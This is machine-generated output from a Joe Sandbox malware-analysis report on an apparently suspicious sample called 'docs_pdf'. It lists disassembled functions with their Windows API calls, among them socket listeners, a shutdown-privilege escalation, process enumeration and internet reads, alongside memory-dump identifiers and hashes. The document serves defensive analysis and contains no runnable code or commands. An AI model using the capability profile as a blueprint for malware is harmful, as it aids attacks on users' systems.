                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                            • String ID: *.*
                                                            • API String ID: 713712311-438819550
                                                            • Opcode ID: b93bebef7217ec0a256b63efd5e0db62459d69a1b8bcf3b473e7b8542b601d4f
                                                            • Instruction ID: c416103b7939dfa91baef649e7e0fa40c99fdcb38e616d60a4d2aa890544b6f9
                                                            • Opcode Fuzzy Hash: b93bebef7217ec0a256b63efd5e0db62459d69a1b8bcf3b473e7b8542b601d4f
                                                            • Instruction Fuzzy Hash: F3416E7190020EDFCF15DF64CC45AEEBBB4FF09311F14456AE929A61A1EB309E89CB90
                                                            Function 00104140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                            • API String ID: 0-1546025612
                                                            • Opcode ID: cc10015b09a6295f3ef9ed473c881d57098468d66e522c8cb88510bac4f49628
                                                            • Instruction ID: 30324e52694974a9c66601a5413048b09e648ed7130d6e4c90d521b45f77908b
                                                            • Opcode Fuzzy Hash: cc10015b09a6295f3ef9ed473c881d57098468d66e522c8cb88510bac4f49628
                                                            • Instruction Fuzzy Hash: B4A27FB0E0421ACBDF38CF58C9907ADB7B1BB54314F1585AAE995A72C0E7B09E85CF50
                                                            Function 001058C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 81368f70666b8188ce4a54f9765ef1288b5fbde6947bfc17267d9cbcb80ab1c9
                                                            • Instruction ID: 4f1eca1977d876fcb35431657487d9b1d6e3f0ce4135934b3a09c6886b6aa79b
                                                            • Opcode Fuzzy Hash: 81368f70666b8188ce4a54f9765ef1288b5fbde6947bfc17267d9cbcb80ab1c9
                                                            • Instruction Fuzzy Hash: 4C129C70A00609DFDF18DFA5D981AEEB7B6FF48300F108669E446E72A1EB35AD51CB50
                                                            Function 0015545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00148CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00148D0D
                                                              • Part of subcall function 00148CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00148D3A
                                                              • Part of subcall function 00148CC3: GetLastError.KERNEL32 ref: 00148D47
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 0015549B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                            • String ID: $@$SeShutdownPrivilege
                                                            • API String ID: 2234035333-194228
                                                            • Opcode ID: 3e47aded13474642e46abb5582c5472f557ed494d6dd1132f9e75c6d002de015
                                                            • Instruction ID: c666b8e9d3879808ad1aefda3fedb08c79731e32bd91b78f0ea00c8833c05ecc
                                                            • Opcode Fuzzy Hash: 3e47aded13474642e46abb5582c5472f557ed494d6dd1132f9e75c6d002de015
                                                            • Instruction Fuzzy Hash: 4101FC31655A11DAE72C5678DC6ABBB725AEB05353F240135FC26DE0D3FB905CC88190
                                                            Function 00166596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001665EF
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 001665FE
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 0016661A
                                                            • listen.WSOCK32(00000000,00000005), ref: 00166629
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00166643
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00166657
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                            • String ID:
                                                            • API String ID: 1279440585-0
                                                            • Opcode ID: 0dac52b1ebf0eaeacc2cd10c2a727b10017f01424af525475dfc7fe97ab6d888
                                                            • Instruction ID: 1b7ed2489d0293ad687d4d8328144b2ca73f70d23d3efdee64519e12da7fa70e
                                                            • Opcode Fuzzy Hash: 0dac52b1ebf0eaeacc2cd10c2a727b10017f01424af525475dfc7fe97ab6d888
                                                            • Instruction Fuzzy Hash: 7D219E302002149FCB10AF24DC45B7EB7B9EF45320F158159E95AA72D2CB70AD91DB51
                                                            Function 00105680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00110FF6: std::exception::exception.LIBCMT ref: 0011102C
                                                              • Part of subcall function 00110FF6: __CxxThrowException@8.LIBCMT ref: 00111041
                                                            • _memmove.LIBCMT ref: 0014062F
                                                            • _memmove.LIBCMT ref: 00140744
                                                            • _memmove.LIBCMT ref: 001407EB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1300846289-0
                                                            • Opcode ID: 3db17ed98aed04c1e42715f6b73669fa434dc4f35e08c3735d9c2a8fc9cd7b2f
                                                            • Instruction ID: 0ffc9ccf9abf63a97f07a5a7fc97dde6c36b81a5a69ee0696994c892dc0e4a20
                                                            • Opcode Fuzzy Hash: 3db17ed98aed04c1e42715f6b73669fa434dc4f35e08c3735d9c2a8fc9cd7b2f
                                                            • Instruction Fuzzy Hash: FC02A070E00209DBCF09DF65D981ABEBBB5FF48300F158069E946DB2A5EB31D951CB91
                                                            Function 000F1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 000F19FA
                                                            • GetSysColor.USER32(0000000F), ref: 000F1A4E
                                                            • SetBkColor.GDI32(?,00000000), ref: 000F1A61
                                                              • Part of subcall function 000F1290: DefDlgProcW.USER32(?,00000020,?), ref: 000F12D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ColorProc$LongWindow
                                                            • String ID:
                                                            • API String ID: 3744519093-0
                                                            • Opcode ID: 83d90d822ff562bbd6836dc68a0e1ad67c3a713c9d7a4aa1dc98f2cffe6800c4
                                                            • Instruction ID: c1fc4c90e43d6e46c636618797f9bb744cb067c1ff726a25f8fc3fd8f2e084d5
                                                            • Opcode Fuzzy Hash: 83d90d822ff562bbd6836dc68a0e1ad67c3a713c9d7a4aa1dc98f2cffe6800c4
                                                            • Instruction Fuzzy Hash: 46A1797010955CFED638AB28AC94DFF36ACDB56341F144209F612D6D92CF258D61B2B3
                                                            Function 00166A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001680A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001680CB
                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00166AB1
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00166ADA
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00166B13
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00166B20
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00166B34
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 99427753-0
                                                            • Opcode ID: 438e36b75f988569d85edcaa17f659a82a8b690087f54cd27567b6f7ee874702
                                                            • Instruction ID: a1ce314cfc6d66657de78144aecb3d8103faff77e7baed5c47a81fded0983970
                                                            • Opcode Fuzzy Hash: 438e36b75f988569d85edcaa17f659a82a8b690087f54cd27567b6f7ee874702
                                                            • Instruction Fuzzy Hash: DD41C375700218AFEB14AF64DC86FBE77A89B44710F04805CFA1AAB7D3CB749D019B92
                                                            Function 001755FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: cd0536fdcf45435a125d92fb3ad1fa9fee7ea3ba999bf8dbc3197d58cc6a1a75
                                                            • Instruction ID: 6c326b4c3de27642ba9a498f876014a5cb80e748b2b188b188e9282966ffecfd
                                                            • Opcode Fuzzy Hash: cd0536fdcf45435a125d92fb3ad1fa9fee7ea3ba999bf8dbc3197d58cc6a1a75
                                                            • Instruction Fuzzy Hash: 3C11C4317009146FE7212F26DC44B6F7BBAEF44761B45842DF90ED7241CBB099828AA5
                                                            Function 0015C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 0015C69D
                                                            • CoCreateInstance.OLE32(00182D6C,00000000,00000001,00182BDC,?), ref: 0015C6B5
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                            • CoUninitialize.OLE32 ref: 0015C922
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                            • String ID: .lnk
                                                            • API String ID: 2683427295-24824748
                                                            • Opcode ID: 86121d16a4277c96c945e43cdd528175bb900816c13b004f160f48086f4d8f73
                                                            • Instruction ID: 122febf1743967b52dc6ab96eb5230df4a46cfe0184e174c33ce710976a650f4
                                                            • Opcode Fuzzy Hash: 86121d16a4277c96c945e43cdd528175bb900816c13b004f160f48086f4d8f73
                                                            • Instruction Fuzzy Hash: 25A12C71108305AFD700EF54CC81EABB7E8EF94704F04496CF6569B1A2DB70EA49CB92
                                                            Function 0016C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00131D88,?), ref: 0016C312
                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0016C324
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                            • API String ID: 2574300362-1816364905
                                                            • Opcode ID: 2de2de14c0fa83ab7dfa66a0f7ff8ae18edba2e639403c7f91af1a0f296278db
                                                            • Instruction ID: cba9927061bfc130e56767d87d9e3fd3042ddeb085f81fc827215b97ffc27a41
                                                            • Opcode Fuzzy Hash: 2de2de14c0fa83ab7dfa66a0f7ff8ae18edba2e639403c7f91af1a0f296278db
                                                            • Instruction Fuzzy Hash: C8E0EC74600713CFDB204B25DC44A5776E4FF09755F80C43DE899D2750E774D891CAA0
                                                            Function 00103190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __itow__swprintf
                                                            • String ID:
                                                            • API String ID: 674341424-0
                                                            • Opcode ID: 611fcc029bc9957790232ce5f4a2bc0b2ae33923dab6b7b59c093118b7f7f4d0
                                                            • Instruction ID: 8df01e79749eccc8c42f2146b2d3881ef39c8c90ed93daa237ecb054bb223f38
                                                            • Opcode Fuzzy Hash: 611fcc029bc9957790232ce5f4a2bc0b2ae33923dab6b7b59c093118b7f7f4d0
                                                            • Instruction Fuzzy Hash: 35228C715083019FC724DF24C891BAFB7E9BF98304F10491DF99697292DBB1EA45CB92
                                                            Function 0016F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0016F151
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0016F15F
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0016F21F
                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0016F22E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                            • String ID:
                                                            • API String ID: 2576544623-0
                                                            • Opcode ID: 47d48209e1005c09f3043c44d845af60d39b3f4a5b0a34b5edb741dbe323f0a4
                                                            • Instruction ID: 274321712118072de79bc8329ab95fed2b07f1756ec124b41d1d4abbae349196
                                                            • Opcode Fuzzy Hash: 47d48209e1005c09f3043c44d845af60d39b3f4a5b0a34b5edb741dbe323f0a4
                                                            • Instruction Fuzzy Hash: 94518D715083159FD310EF24DC85EABBBE8FF98710F14482DF69597292EB70A909CB92
                                                            Function 0014EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0014EB19
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: ($|
                                                            • API String ID: 1659193697-1631851259
                                                            • Opcode ID: 86a12c531e86b82daff587b4a5cddd23b88fd4194e88cacdea00e483c9bcb25b
                                                            • Instruction ID: 9e87bc5e71011d41c63e80f82f46d43fdcf627147b677e579ad8bc93ff15f185
                                                            • Opcode Fuzzy Hash: 86a12c531e86b82daff587b4a5cddd23b88fd4194e88cacdea00e483c9bcb25b
                                                            • Instruction Fuzzy Hash: 2E321775A047059FD728CF29C481A6AB7F1FF48320B15C56EE89ADB3A1D770E981CB44
                                                            Function 001625E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 001626D5
                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0016270C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                            • String ID:
                                                            • API String ID: 599397726-0
                                                            • Opcode ID: efa20964246347e2c4b72e5cde68afc30d79d462efbacf9f241e333bc22e5c0d
                                                            • Instruction ID: 8b464b793dc7c449bc065f7d5f0e3c7ba0c8e3489288c0db339e7e8af976e6cb
                                                            • Opcode Fuzzy Hash: efa20964246347e2c4b72e5cde68afc30d79d462efbacf9f241e333bc22e5c0d
                                                            • Instruction Fuzzy Hash: FB411771A00A09BFEB24DE94DC85EFBB7BCEB50714F10406EFA05A6140EB709E91D760
                                                            Function 0015B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0015B5AE
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0015B608
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0015B655
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID:
                                                            • API String ID: 1682464887-0
                                                            • Opcode ID: 9dd55ce0aebda7f89c73317ba5a0b421fc1a4bd9a7a6c018c6f100523cdd54a3
                                                            • Instruction ID: 36608a5ca2e74c71e4ab356768b1471a4e2ca29a70234a9fcaa941a7fc2182ad
                                                            • Opcode Fuzzy Hash: 9dd55ce0aebda7f89c73317ba5a0b421fc1a4bd9a7a6c018c6f100523cdd54a3
                                                            • Instruction Fuzzy Hash: F7216235A00518EFCB00DF55D8C0AEEBBB8FF49315F1480A9E905AB351DB319955CF51
                                                            Function 00148CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00110FF6: std::exception::exception.LIBCMT ref: 0011102C
                                                              • Part of subcall function 00110FF6: __CxxThrowException@8.LIBCMT ref: 00111041
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00148D0D
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00148D3A
                                                            • GetLastError.KERNEL32 ref: 00148D47
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
